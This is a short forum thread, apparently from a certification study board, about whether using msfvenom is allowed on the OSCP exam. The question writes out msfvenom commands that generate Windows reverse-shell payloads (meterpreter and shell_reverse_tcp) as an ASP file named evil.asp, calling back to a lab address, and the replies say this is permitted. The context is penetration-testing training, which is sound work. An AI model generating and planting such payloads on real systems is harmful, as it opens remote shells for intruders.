msfvenom ok for oscp exam?
mabraFoo
Member Posts: 23 ■□□□□□□□□□
I know you can't use metasploit for every machine on the oscp exam, but what about msfvenom? If I create a malicious asp file like this, is that considered using metasploit?
msfvenom -p windows/meterpreter/reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp
What about this? (shell_reverse_tcp)
msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp
msfvenom -p windows/meterpreter/reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp
What about this? (shell_reverse_tcp)
msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp
Comments
-
invictus_123 Member Posts: 56 ■■□□□□□□□□both of those are fine.
Please re read the exam faq, it tells exactly what is and is not allowed -
eth0 Member Posts: 86 ■■□□□□□□□□If I create a malicious asp file like this, is that considered using metasploit?
No, you can do it for all and you should read exam FAQ .